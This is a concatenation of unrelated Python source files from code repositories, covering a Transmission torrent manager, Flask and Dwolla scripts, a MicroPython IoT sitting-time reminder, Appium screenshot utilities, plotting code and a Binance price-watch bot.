done, pending = await asyncio.wait(coros, timeout=timeout)
logger.info(f"finished asyncio.wait in find service")
for task in pending:
task.cancel()
for task in pending:
await task
return [task.result() for task in done | pending]
return asyncio.run(_wait())
def find(self, metainfo_files: Iterable[MetainfoFile]) -> Iterable[TorrentData]:
metainfo_files = set(metainfo_files)
async def _find_subroutine():
collected: MutableSequence[TorrentData] = []
completion_count = len(metainfo_files)
found_count = 0
generator = self.find_async(metainfo_files)
while True:
try:
result = await generator.__anext__()
collected.append(result)
logger.info(f"found {result}")
if result.location:
found_count += 1
print(
f"{found_count}/{completion_count} {result.metainfo_file} found at {result.location}"
)
except StopAsyncIteration:
logger.info(f"generator exit")
break
except asyncio.CancelledError:
logger.info(f"closing generator")
await generator.aclose()
logger.info(f"finished find subroutine collecting {collected}")
return collected
async def _main():
print(f"Starting search - press Ctrl+C to cancel")
find_task = asyncio.create_task(_find_subroutine())
loop = asyncio.get_event_loop()
def _interrupt():
find_task.cancel()
loop.add_signal_handler(signal.SIGINT, _interrupt)
results = await find_task
return results
return asyncio.run(_main())
class ExcludingFindService(FindService):
def find(
self, metainfo_files: Set[MetainfoFile]
) -> Tuple[Set[TorrentData], Set[MetainfoFile]]:
found, rest = super(ExcludingFindService, self).find(metainfo_files)
return found, set()
class LinkDataService:
def __init__(self, api: TransmissionApi, metainfo_io: MetainfoIO):
self.api = api
self.metainfo_io = metainfo_io
def __query_incomplete_ids(self) -> Set[int]:
id_result: QueryResult[Set[int]] = self.api.get_incomplete_ids()
if id_result.success:
return id_result.value or set()
raise RuntimeError("failed incomplete_ids query")
def __query_metainfo_file_by_id(
self, incomplete_ids: Set[int]
) -> Mapping[int, Path]:
query_result: QueryResult[
Mapping[int, Path]
] = self.api.get_metainfo_file_paths_by_id(incomplete_ids)
if query_result.success:
return query_result.value or dict()
raise RuntimeError("failed torrent_name_by_id query")
def __get_metainfo_path_by_id(self) -> Mapping[int, Path]:
incomplete_ids: Set[int] = self.__query_incomplete_ids()
logger.debug(f"incomplete ids:{incomplete_ids}")
return self.__query_metainfo_file_by_id(incomplete_ids)
def get_incomplete_metainfo_path_by_id(self) -> Mapping[int, Path]:
return self.__get_metainfo_path_by_id()
def change_location(self, torrent_id: int, new_path: Path):
command_result: CommandResult = self.api.change_torrent_location(
torrent_id, new_path
)
if not command_result.success:
raise RuntimeError("failed to change torrent location")
def remove_by_id(self, torrent_id: int):
command_result: CommandResult = self.api.remove_torrent_keeping_data(torrent_id)
if not command_result.success:
raise RuntimeError(f"failed to remove torrent with id:{torrent_id}")
def get_metainfo_raw_value(self, path: Path) -> bytes:
return self.metainfo_io.get_bytes(path)
def restore_metainfo(self, value: bytes, path: Path):
self.metainfo_io.write_bytes(value, path)
def add_with_paths(self, metainfo_path: Path, data_path: Path):
result = self.api.add_torrent_with_files(metainfo_path, data_path)
if not result.success:
raise RuntimeError(
f"failed to add data files from:f{data_path} for metainfo file:f{metainfo_path}"
)
def get_hash_with_torrent_id(self, torrent_id: int) -> str:
result = self.api.get_torrent_hashes_by_id()
if not result.success:
raise RuntimeError(f"failed to retrieve torrent hashes by id")
return result.value[torrent_id]
def get_torrent_id_with_hash(self, torrent_hash: str) -> int:
result = self.api.get_torrent_ids_by_hash()
if not result.success:
raise RuntimeError(f"failed to retrieve torrent ids by hash")
return result.value[torrent_hash]
def trigger_verify(self, torrent_id: int):
result = self.api.verify(torrent_id)
if not result.success:
raise RuntimeError(f"failed to verify torrent")
class LinkService:
def __init__(self, metainfo_reader: MetainfoIO, data_service: LinkDataService):
self.metainfo_reader = metainfo_reader
self.data_service = data_service
def get_incomplete_id_by_metainfo_file(self) -> Mapping[MetainfoFile, int]:
metainfo_path_by_id = self.data_service.get_incomplete_metainfo_path_by_id()
return {
self.metainfo_reader.from_path(path): torrent_id
for (torrent_id, path) in metainfo_path_by_id.items()
}
def change_location(self, torrent_id: int, metainfo_path: Path, new_path: Path):
raw_value = self.data_service.get_metainfo_raw_value(metainfo_path)
torrent_hash = self.data_service.get_hash_with_torrent_id(torrent_id)
self.data_service.remove_by_id(torrent_id)
self.data_service.restore_metainfo(raw_value, metainfo_path)
self.data_service.add_with_paths(metainfo_path, new_path)
new_id = self.data_service.get_torrent_id_with_hash(torrent_hash)
self.data_service.trigger_verify(new_id)
class DryRunLinkService(LinkService):
def change_location(self, torrent_id: int, metainfo_path: Path, new_path: Path):
pass
class AnnounceUrl:
def __init__(self, announce_url: str):
self.announce_url = announce_url
@property
def formatted_hostname(self) -> Optional[str]:
hostname = urlparse(self.announce_url).hostname
if hostname is None:
return None
return "".join([word.capitalize() for word in self.split_hostname(hostname)])
@staticmethod
def split_hostname(hostname: str) -> Sequence[str]:
split = hostname.split(".")
if len(split) > 2:
return split[-2:]
return split
class PruneService:
def __init__(self, client: TransmissionApi):
self.client = client
def get_torrent_hashes(self) -> Set[str]:
query: QueryResult[Mapping[str, int]] = self.client.get_torrent_ids_by_hash()
if not query.success:
raise RuntimeError("get_torrent_ids_by_hash query failed")
value = query.value or dict()
return set(value.keys())
def get_torrent_name_by_id_with_missing_data(self) -> Mapping[int, str]:
query: QueryResult[
Mapping[int, str]
] = self.client.get_torrent_names_by_id_with_missing_data()
if not query.success:
raise RuntimeError("get_torrent_names_by_id_with_missing_data query failed")
return query.value or dict()
def remove_torrent(self, torrent_id: int):
result: CommandResult = self.client.remove_torrent_keeping_data(torrent_id)
if not result.success:
raise RuntimeError("failed remove_torrent command", result)
class OrganizeService:
"""
Queries Transmission for all announce urls and collects a sorted map with:
shortened and camelcase hostname -> announce urls(sorted too)
"""
def __init__(self, client: TransmissionApi, metainfo_reader: MetainfoIO):
self.client = client
self.metainfo_reader = metainfo_reader
def get_announce_urls_by_folder_name(self) -> "OrderedDict[str, Sequence[str]]":
query_result: QueryResult[Set[str]] = self.client.get_announce_urls()
if not query_result.success:
raise RuntimeError("get_announce_urls query failed")
groups_by_name = self._get_groups_by_name(query_result.value or set())
groups_sorted_by_name = self._sort_groups_by_name(groups_by_name)
return self._sort_url_sets(groups_sorted_by_name)
@staticmethod
def _sort_url_sets(
groups_by_name: Mapping[str, Set[str]]
) -> "OrderedDict[str, Sequence[str]]":
result: "OrderedDict[str, Sequence[str]]" = OrderedDict()
for (name, urls) in groups_by_name.items():
result[name] = sorted(urls)
return result
@staticmethod
def _sort_groups_by_name(
groups: Mapping[str, Set[str]]
) -> "OrderedDict[str, Set[str]]":
return OrderedDict(sorted(groups.items()))
@staticmethod
def _get_groups_by_name(announce_urls: Set[str]) -> Mapping[str, Set[str]]:
"""Groups announce_urls by shortened name"""
trackers: MutableMapping[str, Set[str]] = {}
for url in announce_urls:
try:
hostname = AnnounceUrl(url).formatted_hostname
if hostname is None:
continue
try:
trackers[hostname].add(url)
except KeyError:
trackers[hostname] = {url}
except IndexError:
continue
return trackers
def get_announce_urls_by_torrent_id(self) -> Mapping[int, Set[str]]:
result: QueryResult[Mapping[int, Set[str]]] = self.client.get_torrent_trackers()
if not result.success:
raise RuntimeError("get_torrent_trackers query failed")
return result.value or dict()
def move_location(self, torrent_id: int, new_path: Path):
command_result: CommandResult = self.client.move_torrent_location(
torrent_id, new_path
)
if not command_result.success:
raise RuntimeError("failed to change torrent location")
def get_torrent_location(self, torrent_id: int) -> Path:
result: QueryResult[Path] = self.client.get_torrent_location(torrent_id)
if not result.success or result.value is None:
raise RuntimeError("get_torrent_location query failed")
return result.value
def get_metainfo_file(self, torrent_id: int) -> MetainfoFile:
result: QueryResult[Path] = self.client.get_metainfo_file_path(torrent_id)
if not result.success or result.value is None:
raise RuntimeError("get_torrent_location query failed")
return self.metainfo_reader.from_path(result.value)
| StarcoderdataPython |
242953 | <filename>hkust-gmission/gmission/rest/base.py<gh_stars>100-1000
from flask import request
from gmission.blueprints.user import jwt_auth
__author__ = 'chenzhao'
import inspect
class ReSTBase(object):
@classmethod
def universal_before_post(cls, data):
# print 'Universal before_post'
data.pop('id', None)
@classmethod
def universal_after_get_many(cls, result=None, search_params=None, **kwargs):
if request.method == 'HEAD':
if result is not None:
result.pop('objects', [])
pass
@classmethod
@jwt_auth()
def check_user_token(cls, **kw):
return True
@classmethod
def processor_name_mapping(cls, prefix):
exclude_list = []
processors = {}
processors_fields = ['GET_SINGLE', 'GET_MANY', 'PATCH_SINGLE', 'PATCH_MANY', 'PUT_SINGLE', 'PUT_MANY', 'POST',
'DELETE']
for raw_method in inspect.getmembers(cls, predicate=inspect.ismethod):
name, method = raw_method
if name.startswith(prefix):
processors[name[len(prefix) + 1:].upper()] = [method.__get__(cls), ]
# if cls.__name__ not in exclude_list and prefix == 'before':
# for key in processors_fields:
# preprocessor = processors.get(key, [])
# preprocessor.insert(0, cls.check_user_token)
# processors[key] = preprocessor
return processors
@classmethod
def universal_preprocessors(cls):
prefix = 'universal_before'
return ReSTBase.processor_name_mapping(prefix)
@classmethod
def universal_postprocessors(cls):
prefix = 'universal_after'
return ReSTBase.processor_name_mapping(prefix)
@classmethod
def rest_preprocessors(cls):
prefix = 'before'
return cls.processor_name_mapping(prefix)
@classmethod
def rest_postprocessors(cls):
prefix = 'after'
return cls.processor_name_mapping(prefix)
@classmethod
def rest_exclude_columns(cls):
# r = [cln for cln in cls.__mapper__.columns if isinstance(cln, db.RelationshipProperty)]
return [str(r).split('.')[1] for r in cls.__mapper__.relationships]
| StarcoderdataPython |
3232763 | import csv
import dwollav2
client = dwollav2.Client(
key='REPLACE WITH CLIENT ID',
secret='REPLACE WITH SECRET KEY',
environment='sandbox' # Set to sandbox, change to production if needed
)
customer_id = 'REPLACE WITH CUSTOMER ID'
# Gets a token from the client object
token = client.Auth.client()
# Create URL to endpoint using customer_id
url = f'customers/{customer_id}/transfers'
# Make request
res = token.get(url)
transfers = res.body['_embedded']['transfers']
transactions = []
while True:
for transfer in transfers:
obj = {}
obj['ID'] = transfer['id']
obj['Created'] = transfer['created']
obj['Status'] = transfer['status']
obj['Amount'] = transfer['amount']['value']
transactions.append(obj)
if not 'next' in res.body['_links']:
break
res = token.get(res.body['_links']['next']['href'])
transfers = res.body['_embedded']['transfers']
fields = ['ID', 'Created', 'Status', 'Amount']
filename = f'{customer_id}.csv'
with open(filename, 'w') as f:
writer = csv.DictWriter(f, fields)
writer.writeheader()
writer.writerows(transactions)
| StarcoderdataPython |
1618835 | <reponame>ImJuanan/flask-milligram
# -*- coding: utf-8 -*-
import random
from flask import Flask, render_template, request
from flask_milligram import Milligram
from flask_sqlalchemy import SQLAlchemy
app = Flask(__name__)
app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False
app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///:memory:'
milligram = Milligram(app)
db = SQLAlchemy(app)
class Movie(db.Model):
_id = db.Column(db.Integer, primary_key=True)
title = db.Column(db.String(55), nullable=False)
genre = db.Column(db.String(55), nullable=False)
publish_year = db.Column(db.Integer, nullable=False)
rating = db.Column(db.Float, nullable=False)
@app.before_first_request
def generate_fake_data():
db.drop_all()
db.create_all()
for i in range(30):
m = Movie(
title=f'Title {i + 1}',
genre=f'Genre {i + 1}',
publish_year=random.randint(2000, 2021),
rating=round(random.uniform(0, 5), 1)
)
db.session.add(m)
db.session.commit()
@app.route('/')
def index():
return render_template('index.html')
@app.route('/nav')
def test_nav():
return render_template('nav.html')
@app.route('/pagination')
def test_pagination():
page = request.args.get('page', 1, type=int)
pagination = Movie.query.paginate(page, per_page=6)
movies = pagination.items
return render_template('pagination.html', pagination=pagination, movies=movies)
@app.route('/badge')
def test_badge():
return render_template('badge.html')
if __name__ == '__main__':
app.run(debug=True)
| StarcoderdataPython |
3554779 | #########
from aliyunIoT import Device # iot组件是连接阿里云物联网平台的组件
import network # Wi-Fi功能所在库
import ujson
##################
from driver import I2C,GPIO,TIMER
import utime
from ssd1306 import SSD1306_I2C
import ir
import time
temptimerObj = 0
time_dict = {}
#########
# 物联网平台连接标志位
iot_connected = False
wlan = None
# 三元组信息
productKey = "产品密钥" #需要填入物联网云平台申请到的productKey信息
deviceName = "设备名称" #需要填入物联网云平台申请到的deviceName信息
deviceSecret = "设备密钥" #需要填入物联网云平台申请到的deviceSecret信息
# 物联网设备实例
device = None
# Wi-Fi SSID和Password设置
wifiSsid = "请填写您的路由器名称"
wifiPassword = "<PASSWORD>路由器密码"
# 等待Wi-Fi成功连接到路由器
def get_wifi_status():
global wlan
wifi_connected = False
wlan.active(True) #激活界面
wlan.scan() #扫描接入点
#print("start to connect ", wifiSsid)
wlan.connect(wifiSsid, wifiPassword) # 连接到指定路由器的名称和密码
while True:
wifi_connected = wlan.isconnected() # 获取Wi-Fi连接路由器的状态信息
if wifi_connected: # Wi-Fi连接成功则退出while循环
break
else:
utime.sleep(0.5)
print("wifi_connected:", wifi_connected)
ifconfig = wlan.ifconfig() #获取接口的IP/netmask/gw/DNS地址
print(ifconfig)
utime.sleep(0.5)
# 物联网平台连接成功的回调函数
def on_connect(data):
global iot_connected
iot_connected = True
# 设置props 事件接收函数(当云平台向设备下发属性时)
def on_props(request):
pass
# 上传休息提醒状态到物联网平台
def report_event(data):
upload_data = {'params': ujson.dumps({
'call_rst': data,
})
}
device.postProps(upload_data)
def connect_lk(productKey, deviceName, deviceSecret):
global device, iot_connected
key_info = {
'region': 'cn-shanghai',
'productKey': productKey,
'deviceName': deviceName,
'deviceSecret': deviceSecret,
'keepaliveSec': 60
}
# 将三元组信息设置到iot组件中
device = Device()
# 设定连接到物联网平台的回调函数,如果连接物联网平台成功,则调用on_connect函数
device.on(Device.ON_CONNECT, on_connect)
# 如果收到物联网平台发送的属性控制消息
device.on(Device.ON_PROPS, on_props)
# 启动连接阿里云物联网平台过程
device.connect(key_info)
# 等待设备成功连接到物联网平台
while(True):
if iot_connected:
print('物联网平台连接成功')
break
else:
print('sleep for 1 s')
utime.sleep(1)
print('sleep for 2s')
utime.sleep(2)
#########
PERSON_MOVE = 1
PERSON_LEAVE = 2
PERSON_NOMOVE = 3
ir_event = 0
tick_time = 0
total_time = 0
first_move = 0
has_rest = 0
has_leve = 0
timer_interval_1000ms = 1000 #单位ms
check_max_time1 = (90) #单位s ,用于判断当前区域没有人的时间阈值 (60*timer_interval_1000ms)
check_max_time2 = (45*60) #单位s,用于判断人在当前区域的最大时间阈值 (60*60*timer_interval_1000ms)
CHECK_NOPERSON_MAX_TIME = check_max_time1
CHECK_HASPERSON_MAX_TIME = check_max_time2
gpioirDev =0
def irq_handler(data):
global tick_time,total_time,gpioirDev,first_move,has_rest,has_leve,ir_event
if first_move == 0:
first_move = 1
ret = gpioirDev.read()
if ret == 1:
print('person come')
if tick_time >= CHECK_NOPERSON_MAX_TIME:
print("person has left ",tick_time)
total_time = 0
tick_time = 0
has_leve = 1
ir_event = PERSON_LEAVE
return
else:
total_time += tick_time
print("check person move ",tick_time,total_time)
tick_time = 0
ir_event = PERSON_MOVE
elif ret == 0:
total_time += tick_time
print('check person nomove ',tick_time,total_time)
tick_time = 0
ir_event = PERSON_NOMOVE
if total_time >= CHECK_HASPERSON_MAX_TIME:
has_rest = 1
total_time = 0
print('you need has rest,because you work too long')
# init function
def ir_check_init():
global gpioirDev,ir_event
gpioirDev = GPIO()
gpioirDev.open("ir")
gpioirDev.on(irq_handler)
irDev = ir.IR(gpioirDev)
ret = gpioirDev.read()
if ret == 1:
print('person come')
ir_event = PERSON_MOVE
elif ret == 0:
print('no person')
ir_event == PERSON_NOMOVE
#初始化oled模块
def oled_init():
global oled
i2cObj = I2C()
i2cObj.open("ssd1306")
print("ssd1306 inited!")
oled = SSD1306_I2C(128, 64, i2cObj)
oled.fill(0) #清屏背景黑色
oled.text('2022-01-03', 30, 5)
oled.text('12:00:00', 30, 22)
oled.text(str('----------------------'),3,32)
oled.text('connecting', 30, 40)
oled.show()
def display_time(timeArray):
global total_time,tick_time
val_time = int((total_time + tick_time)/60)
oled.fill(0)
oled.text(str('%d-%02d-%02d'%(timeArray[0],timeArray[1],timeArray[2])),30,5)
oled.text(str('%02d:%02d:%02d'%(timeArray[3],timeArray[4],timeArray[5])),30,22)
oled.text(str('----------------------'),3,32)
if ir_event == PERSON_MOVE:
oled.text('move', 40, 40)
oled.text(str('%02d'%(val_time)),4,13)
elif ir_event == PERSON_LEAVE:
oled.text('person leave', 25, 40)
oled.text(str('--'),2,13)
elif ir_event == PERSON_NOMOVE:
oled.text('no move', 40, 40)
oled.text(str('%02d'%(val_time)),4,13)
oled.show()
def timer_callback(args):
global tick_time,first_move,time_dict
timeArray = time.localtime()
display_time(timeArray)
if first_move == 1 and has_leve == 0:
tick_time += 1
def temp_timer_stop():
temptimerObj.stop()
def temp_timer_start():
temptimerObj.start()
def timer_init():
global temptimerObj
temptimerObj = TIMER(0)
temptimerObj.open(mode=temptimerObj.PERIODIC, period=timer_interval_1000ms, callback=timer_callback)
temptimerObj.start()
if __name__ == '__main__' :
oled_init()
#########
wlan = network.WLAN(network.STA_IF) #创建WLAN对象
get_wifi_status()
connect_lk(productKey, deviceName, deviceSecret)
#########
ir_check_init()
timer_init()
while True:
if has_rest == 1:
has_rest = 0
report_event(1)
print('report rest')
if has_leve == 1:
has_leve = 0
report_event(0)
print('report leve')
utime.sleep(1)
| StarcoderdataPython |
3282785 | from appium.webdriver import webdriver
from datetime import datetime
from selenium.common.exceptions import WebDriverException
"""
To get to know how to use this project: https://github.com/AntoData/appium-framework/wiki
"""
class ScreenshotUtils:
"""
This class provides a key tool for this framework as it is the missing piece that automates the process of getting
screenshots and saves then in the right folder with the right name
"""
def __init__(self, driver: webdriver):
"""
This class receives a webdriver that will be used to get the screenshot and using the custom made capability
"screenshots_path" that we added in the abstract class appwindowobject to know in which folder we want these
screenshots to be saved
:param driver: Instance of webdriver
"""
self.__driver = driver
def take_screenshot(self) -> None:
"""
This method takes a screenshot in the right folder for the test that is current being run
:return: None
"""
# We get the current date and time
now = datetime.now()
# We turn it to string with precision to the millisecond, this will be the name of the screenshot
current_timestamp = now.strftime("%Y_%m_%d-%H_%M_%S_%f")
# We get the path for the folder where we will save the screenshot for the capability "screenshots_path"
# that was added to that instance of the driver in the constructor
intial_path: str = self.__driver.capabilities["screenshots_path"]
# We build the whole path to the png file
intial_path = intial_path + "//" + current_timestamp + ".png"
# We use a try/except block to perform the screenshot to catch any possible exception and keep going in that
# case
try:
# We perform the screenshot
self.__driver.get_screenshot_as_file(intial_path)
except WebDriverException as e:
# We catch this exception, this can be a common exception as the developer can forbid getting a screenshot
# of a view if the flag detailed below is set in a particular value
# We will just tell the user and go on
print("{0}: We can't take a screenshot of this view, the developer set the following flag"
" 'LayoutParams.FLAG_SECURE'".format(e))
print("We caught this and go on with the execution")
| StarcoderdataPython |
8144215 | from object_database.web.cells.cells import Cells
from object_database.web.cells.cell import Cell, context
from object_database.web.cells.main import Main
from object_database.web.cells.root_cell import RootCell
from object_database.web.cells.scrollable import Scrollable, VScrollable, HScrollable
from object_database.web.cells.layout import (
FillSpace,
HCenter,
VCenter,
Center,
Top,
Left,
LeftCenter,
Bottom,
Right,
RightCenter,
TopLeft,
TopCenter,
TopRight,
BottomLeft,
BottomCenter,
BottomRight,
)
from object_database.web.cells.flex import Flex
from object_database.web.cells.grid import Grid
from object_database.web.cells.header_bar import HeaderBar
from object_database.web.cells.columns import Columns
from object_database.web.cells.highlighted import Highlighted
from object_database.web.cells.expands import Expands
from object_database.web.cells.dropdown import Dropdown
from object_database.web.cells.dropdown_drawer import DropdownDrawer, CircleLoader
from object_database.web.cells.container import Container
from object_database.web.cells.deprecated import LargePendingDownloadDisplay
from object_database.web.cells.panel import CollapsiblePanel, Panel
from object_database.web.cells.non_builtin_cell import NonBuiltinCell
from object_database.web.cells.popover import Popover
from object_database.web.cells.tabs import Tabs
from object_database.web.cells.sized import Sized
from object_database.web.cells.context_menu import ContextMenu
from object_database.web.cells.menu_item import MenuItem
from object_database.web.cells.session_state import sessionState, SessionState
from object_database.web.cells.leaves import (
Octicon,
Badge,
Text,
Traceback,
Code,
Timestamp,
Span,
)
from object_database.web.cells.sequence import Sequence, HorizontalSequence
from object_database.web.cells.subscribed import (
Subscribed,
SubscribedSequence,
HorizontalSubscribedSequence,
HSubscribedSequence,
VSubscribedSequence,
)
from object_database.web.cells.webgl_plot import WebglPlot
from object_database.web.cells.card import Card, CardTitle
from object_database.web.cells.modal import Modal, ButtonModal
from object_database.web.cells.button import Clickable, Button, ButtonGroup
from object_database.web.cells.single_line_text_box import SingleLineTextBox
from object_database.web.cells.slot import Slot
from object_database.web.cells.computed_slot import ComputedSlot
from object_database.web.cells.contextual_display import ContextualDisplay, registerDisplay
from object_database.web.cells.views.split_view import SplitView
from object_database.web.cells.code_editor import CodeEditor
from object_database.web.cells.plot import Plot
from object_database.web.cells.table import Table
from object_database.web.cells.padding import Padding
from object_database.web.cells.border import Border
from object_database.web.cells.views.page_view import PageView
from .non_display.key_action import KeyAction
from object_database.web.cells.util import (
ensureSubscribedType,
ensureSubscribedSchema,
wrapCallback,
SubscribeAndRetry,
waitForCellsCondition,
)
from .sheet import Sheet
from object_database.web.cells.views.resizable_panel import ResizablePanel
from object_database.web.cells.children import Children
MAX_FPS = 50
| StarcoderdataPython |
5049053 | <reponame>VictorOnink/Particle-Trajectory-Analysis
import socket
import os
# Checking which computer the code is running on
HOSTNAME = 'Victors-MBP.home'
if socket.gethostname() == HOSTNAME:
SERVER = 'laptop'
else:
SERVER = 'remote_server'
JOB_ID = int(os.environ["JOB_ID"])
# Setting directory paths
machine_home_directory = os.path.expanduser('~')
ROOT_DIREC_DICT = {'laptop': machine_home_directory + '/Desktop/Pau data analysis/',
'remote_server': machine_home_directory + '/PauProject/'}
ROOT_DIREC = ROOT_DIREC_DICT[SERVER]
DATA_DIREC = ROOT_DIREC + 'Data/'
FIGURE_DIREC = ROOT_DIREC + 'Figures/'
OUTPUT_DIREC = ROOT_DIREC + 'Output/'
# Names of the video files
VIDEO_LIST = ['SchwarzD_1.mp4', 'SchwarzD_2.mp4', 'SchwarzD_3.mp4', 'SchwarzG_1.mp4', 'SchwarzG_2.mp4',
'SchwarzG_3.mp4', 'SchwarzP_1.mp4', 'SchwarzP_2.mp4', 'SchwarzP_3.mp4'] | StarcoderdataPython |
9644286 | from typing import List
class Solution:
def swap(self, s, pair_index: List):
s_list = list(s)
s_list[pair_index[0]], s_list[pair_index[1]] = s_list[pair_index[1]], s_list[pair_index[0]]
return ''.join(s_list)
def smallestStringWithSwaps(self, s: str, pairs: List[List[int]]) -> str:
swap_s = ''
flag = True
while swap_s < s and flag:
for pair in pairs:
swap_s = self.swap(s, pair)
print(swap_s, pair)
if swap_s < s:
s = swap_s
if pairs.index(pair) == len(pairs) - 1:
flag = False
return s
if __name__ == '__main__':
s = Solution()
ss = "dcab"
# print(s.swap(ss, [1, 2]))
pairs = [[0, 3], [1, 2], [0, 2]]
print(s.smallestStringWithSwaps(ss, pairs))
| StarcoderdataPython |
1836416 | <reponame>Ohara124c41/Nao-Robot
import sys
from naoqi import ALProxy
def main(robotIP = "192.168.0.117", PORT=9559):
try:
postureProxy = ALProxy("ALRobotPosture", "192.168.0.117", 9559)
except Exception, e:
print "Could not create proxy to ALRobotPosture"
print "Error was: ", e
postureProxy.goToPosture("StandInit", 1.0)
print postureProxy.getPostureFamily()
if __name__ == "__main__":
robotIp = "127.0.0.1"
if len(sys.argv) <= 1:
print "Usage python alrobotposture.py robotIP (optional default: 127.0.0.1)"
else:
robotIp = sys.argv[1]
main("192.168.0.117")
motionProxy.rest() | StarcoderdataPython |
11285059 | <reponame>vutsalsinghal/python-terrascript
# terrascript/grafana/__init__.py
import terrascript
class grafana(terrascript.Provider):
pass | StarcoderdataPython |
9753822 |
import pkgutil
import custompack.custom as custom
# See https://stackoverflow.com/questions/1707709/list-all-the-modules-that-are-part-of-a-python-package/1707786#
package = custom
for importer, modname, ispkg in pkgutil.iter_modules(package.__path__):
print("Found submodule %s (is a package: %s)" % (modname, ispkg))
| StarcoderdataPython |
279899 |
from numpy import *
import matplotlib.pyplot as plt
from scipy import interpolate
import sys
# x = loadtxt('cdf_r.dat')
# y = arange(0, size(x),1)/float(size(x))
U_x = sort(loadtxt(sys.argv[1])[:,6])
for cnt in range(size(U_x)):
if U_x[cnt] > 1.5:
break;
U_x = U_x[:cnt]
U_t = []
for i in linspace(0,size(U_x)-1, 5000):
U_t.append(U_x[int(i)])
N_t = size(U_t)
y = arange(0, N_t, 1)/float(N_t)
U_t_min = min(U_t)
U_t_max = max(U_t)
tck = interpolate.splrep(U_t,y,k=3,s=0)
U_tnew = linspace(U_t_min, U_t_max, 5000)
# xnew = arange(min(x), max(x), 0.0001)
ynew = interpolate.splev(U_tnew, tck, der=0)
diff = interpolate.splev(U_tnew, tck, der=1)
# ref_line = asarray([[1., -0.1],
# [1., 5]])
plt.clf()
fig, ax1 = plt.subplots()
leg = []
ax2 = ax1.twinx()
leg.append(ax1.plot(U_t, y, 'bo', markerfacecolor='white', markeredgecolor='blue', label='CDF(U), data')[0])
leg.append(ax1.plot(U_tnew, ynew, 'r-', label='CDF(U), interpolated')[0])
leg.append(ax2.plot(U_tnew, diff, 'k-', label = 'PDF(r)')[0])
# leg.append(ax2.plot(t_cheby, diff_cheby, 'g-', label='PDF(r), Chebyshev')[0])
# leg.append(ax2.plot(ref_line[:,0], ref_line[:,1], 'r--', linewidth=3, label='Range for Repulsion')[0])
ax1.grid('on')
ax1.set_xlabel('distance, r')
ax1.set_ylabel('cumulative distribution function for energy, CDF(r)')
ax2.set_ylabel('probability distribution function from cdf, PDF(r)')
# legend_line = ax.legend(handles=leg, loc = 'upper left', numpoints=1)
plt.legend(handles=leg, loc = 'upper left', numpoints=1, ncol=2)
# ax1.axis([t_min, t_max, -0.1, 1])
# ax2.axis([t_min, t_max, -0.1, 5])
plt.savefig(sys.argv[2])
# plt.show()
# c = get_polynomial_from_Cheby(tnew, ynew, 12)
# t_cheby = linspace(min(tnew), max(tnew), 100)
# y_cheby = gen_from_polynomial(t_cheby, c)
# diff_cheby = diff_gen_from_polynomial(t_cheby, c)
| StarcoderdataPython |
222097 | # -------------------- PATH ---------------------
#ROOT_PATH = "/local/data2/pxu4/TypeClassification"
ROOT_PATH = "."
DATA_PATH = "%s/data" % ROOT_PATH
ONTONOTES_DATA_PATH = "%s/OntoNotes" % DATA_PATH
BBN_DATA_PATH="%s/BBN" % DATA_PATH
LOG_DIR = "%s/log" % ROOT_PATH
CHECKPOINT_DIR = "%s/checkpoint" % ROOT_PATH
OUTPUT_DIR = "%s/output" % ROOT_PATH
PKL_DIR='./pkl'
EMBEDDING_DATA = "%s/glove.840B.300d.txt" % DATA_PATH
testemb='testemb'
prep='prep'
# -------------------- DATA ----------------------
ONTONOTES_ALL = "%s/all.txt" % ONTONOTES_DATA_PATH
ONTONOTES_TRAIN = "%s/train.txt" % ONTONOTES_DATA_PATH
ONTONOTES_VALID = "%s/dev.txt" % ONTONOTES_DATA_PATH
ONTONOTES_TEST = "%s/test.txt" % ONTONOTES_DATA_PATH
ONTONOTES_TYPE = "%s/type.pkl" % ONTONOTES_DATA_PATH
ONTONOTES_TRAIN_CLEAN = "%s/train_clean.tsv" % ONTONOTES_DATA_PATH
ONTONOTES_TEST_CLEAN = "%s/test_clean.tsv" % ONTONOTES_DATA_PATH
BBN_ALL = "%s/all.txt" % BBN_DATA_PATH
BBN_TRAIN = "%s/train.txt" % BBN_DATA_PATH
BBN_VALID = "%s/dev.txt" % BBN_DATA_PATH
BBN_TEST = "%s/test.txt" % BBN_DATA_PATH
BBN_TRAIN_CLEAN = "%s/train_clean.tsv" % BBN_DATA_PATH
BBN_TEST_CLEAN = "%s/test_clean.tsv" % BBN_DATA_PATH
BBN_TYPE = "%s/type.pkl" % BBN_DATA_PATH
# --------------------- PARAM -----------------------
MAX_DOCUMENT_LENGTH = 30
MENTION_SIZE = 15
WINDOW_SIZE = 10
RANDOM_SEED = 2017 | StarcoderdataPython |
6543128 | import typing as t
from dagos.core.components import SoftwareComponent
from dagos.platform import OperatingSystem
from dagos.platform import PlatformIssue
from dagos.platform import PlatformSupportChecker
class GitHubCliSoftwareComponent(SoftwareComponent):
"""
Manage the GitHub CLI.
The GitHub CLI is useful for interacting with GitHub from the command line.
Project home: <https://github.com/cli/cli>
"""
def __init__(self) -> None:
super().__init__("github-cli")
def supports_platform(self) -> t.List[PlatformIssue]:
return (
PlatformSupportChecker()
.check_operating_system([OperatingSystem.LINUX])
.issues
)
| StarcoderdataPython |
1963641 | import os
from time import time
from binance.client import Client
from binance.exceptions import BinanceAPIException
from dotenv import load_dotenv
load_dotenv()
API_KEY = os.getenv("BINANCE_API_KEY")
SECRET_KEY = os.getenv("BINANCE_SECRET_KEY")
client = Client(API_KEY, SECRET_KEY)
def generate_watchpair_msg(watchpair):
ticker = client.get_ticker(symbol=watchpair[1])
last_price = float(ticker['lastPrice'])
change = float(ticker['priceChangePercent'])
if last_price > watchpair[3]:
arrow = '↑'
elif last_price < watchpair[3]:
arrow = '↓'
else:
arrow = '→'
if last_price > 1:
formatted_price = f'{"%.2f" % last_price}'
else:
formatted_price = f'{"%.8f" % last_price}'
return f'{arrow} {watchpair[1]} {formatted_price} ({"%+.1f" % change}%)', last_price
def create_watchpair(chat_id, args):
if len(args) != 2:
return False, 'Usage:\n/watch <pair> <interval>'
refresh = int(args[1])
if not 1 <= refresh <= 1440:
return False, 'Invalid interval.'
pair = args[0]
try:
price = client.get_ticker(symbol=pair)['lastPrice']
except BinanceAPIException:
return False, 'Invalid pair.'
return [[chat_id, pair, refresh, float(price), int(time())], None]
def create_watchtrade(chat_id, args):
if len(args) != 3:
return False, 'Usage:\n/wtrade <pair> <interval> <enterPrice>'
try:
refresh = int(args[1])
if not 1 <= refresh <= 1440:
raise ValueError
except ValueError:
